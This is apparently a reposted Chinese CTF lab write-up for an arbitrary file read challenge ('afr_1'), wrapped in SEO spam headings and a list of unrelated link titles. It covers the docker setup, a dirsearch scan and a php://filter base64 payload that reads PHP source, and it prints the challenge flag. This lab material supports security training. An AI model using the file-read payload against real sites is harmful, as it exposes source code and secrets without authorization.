当前位置: 首页 > news >正文

姚安县党风廉政建设 网站如何做网站推广优化

姚安县党风廉政建设 网站,如何做网站推广优化,外企公司网站开发设计,太原市住房和城乡建设厅网站1.1漏洞描述 漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式 1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现 1.4.1.基础环境 靶场docker工具BurpSuite 1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: …

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_1
漏洞类型文件读取
漏洞等级
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.靶场搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
    ports:
      - 80:80

        2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 80端口

        搭建成功 

1.5深度利用

1.5.1漏洞点

  • 1.dirsearch目录扫描

dirsearch --url http://10.9.47.79 

  • 2.查看 /flag.php

  • 3.查看/index.php

  • 发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

  • 4.使用php://fileter 读取(读取php源码)

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

  • 它读取到的结果是base64加密的 

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

  • 5.进行base64解码

  • 6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

http://www.tj-hxxt.cn/news/8902.html

相关文章:

  • 网站建设开发合同书深圳网站建设公司官网
  • 发布设计任务的网站nba排名赛程
  • dreamweaver网站制作磁力狗bt
  • 做网站的基本要求百度竞价开户流程
  • 成都网站建设哪家好北京最新发布信息
  • 一个一起做网站网站自动收录
  • 电子商务网站建设策划书开网站需要投资多少钱
  • 死循环网站点击软件
  • 哪个网站做相册好湖北网站设计
  • 有趣的网站设计app推广接单平台
  • 动易手机网站模板神马站长平台
  • 定制网站型网站开发专业黑帽seo推广
  • 长沙seo男团百度seo关键词排名优化
  • 西安做网站公司怎么样谷歌搜索引擎免费入口 台湾
  • 农产品网站建设姓名查询
  • 保定投递网站建设seo好seo
  • 网站用什么软件做败sp企业短视频推广
  • 宁波网站建站的公司网站建站哪家公司好
  • 视频网站开发步骤新品牌进入市场的推广方案
  • 网站都是哪里找的网站优化排名哪家性价比高
  • wordpress国产网校百度seo优化技巧
  • 金坛网站建设公司重庆seo标准
  • 两学一做 山西答题网站百度搜索关键词统计
  • 温州专业手机网站制作哪家便宜各平台推广费用
  • 做网站背景图片怎么放网络游戏营销策略
  • 做pc和移动网站的适配深圳网站维护
  • 女孩做网站工作辛苦吗美橙互联建站
  • 基于cms的网站设计与实现毕业论文西安专业网络推广平台
  • 岳阳设计网站推荐品牌营销战略
  • 分类网站开发2022最近比较火的热点话题